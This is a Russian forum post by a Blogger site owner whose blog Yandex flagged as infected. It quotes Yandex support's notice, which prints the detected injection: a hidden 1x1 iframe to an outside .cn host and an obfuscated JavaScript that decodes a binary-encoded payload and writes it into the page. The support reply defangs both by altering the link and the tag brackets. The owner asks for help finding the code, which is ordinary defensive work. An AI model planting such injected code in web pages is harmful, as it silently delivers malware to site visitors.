Яндекс обнаружил вирусы.

http://blog.obmen.us/2010/02/blog-post_26.html 29.07.2011 Поведенческий анализ

http://blog.obmen.us/2007/05/webmoney.html 29.07.2011 Поведенческий анализ

http://blog.obmen.us/2008/06/rupau-rbc-money.html 29.07.2011 Поведенческий анализ

http://blog.obmen.us/2011/07/blog-post_25.html 31.07.2011 Поведенческий анализ

Вот докопался Яндекс до блога (платформа блоггер.ком).

Вирусы они нашли. Я весь код перекопал, не вижу не фига.

Написал запрос.

Платоны ответили (и тут они как тут)

------------------------------

Здравствуйте!

При посещении Вашего сайта антивирусный робот Яндекса обнаружил вредоносный код следующего содержания:

[iframe src="h**p://zemlyavozduh.cn/show.php?s=1893da9ce4" width="1" height="1" style="display:none;"></iframe]

а также

[script>xijor="22555522255522552555252225555225255255222552252522522222255525222555

52252555222225522525225555252252225225552522255225252555522225552522225255552552

22552555225525552255225222522255555222522255255525222555225525525225255255222252

22222555525525552555255252252552252225552522255252222255525222522222225522222555

22222555522222555255255252222552252525525225255225552552522225552522225552522252

22222255222225552222255552222255525525522552255522522552222525525525255225252552

22522552555525552252255225222552252525552252225552522252222225525552255255552255

52552555255225525225255522552552522525522252255252252552552225525225255525222555

52252255525222522222255252222552522525522522255225222552252525525552225552552555

55252255552222525555255522552555252225555225255255222552252522555552225555222552

52252552255225552252255222252552552525522525225222222552522525522522225555252252

22522555252225552255255252252552552222522252225222222555225525552252255222552255

552522522252255252222555252225552522255522222255525222525555225255552555225525552

52225552252255255552552555225522225255525222252555225522255255255552552552522525

55525552255225255552552522525525552225255522552225525522555255252252255555522552

25222522252225555522255552222525555255252252552255225552252255222252552552525522

52522555552";vpbvc=100;wxmeb=this;aknnp="i"+"te";ntak=116;dyujh="wr"+aknnp;for(buvld in wxmeb)

{if(buvld.length==8 && buvld.charCodeAt(0)==vpbvc && buvld.charCodeAt(7)==ntak)

{break;}}o="";psgpt=0;rgntm=wxmeb[buvld];rbho=53;while (psgpt<xijor.length){goibp=0;for(vxqle=0;vxqle<8;vxqle++)

{goibp=goibp<<1;if(xijor.charCodeAt(psgpt+vxqle)==rbho){goibp++;}}psgpt=psgpt+3;rgntm[dyujh](String.fromCharCode(goibp));psgpt=psgpt+5;}</script]

Звездочки в ссылке вставлены во избежание случайного перехода, скобки в тегах изменены во избежание случайного срабатывания кода.

Пожалуйста, проверьте страницы Вашего сайта и удалите вредоносный код. Вскоре после этого наш робот перепроверит Ваш сайт и, если вредоносный код более не будет обнаружен, пометка в выдаче снимется. Перечень зараженных страниц можно узнать в Яндекс.Вебмастере ( http://webmaster.yandex.ru ).

--

С уважением, Платон Щукин

Служба поддержки Яндекса

http://help.yandex.ru/

================================

Я слепой?

Реально не вижу в коде того, что пишут. Уже даже страницу через онлайн сервисы проверки на вирусы прогнал. Вирусы видит только Яндекс.

Что делать?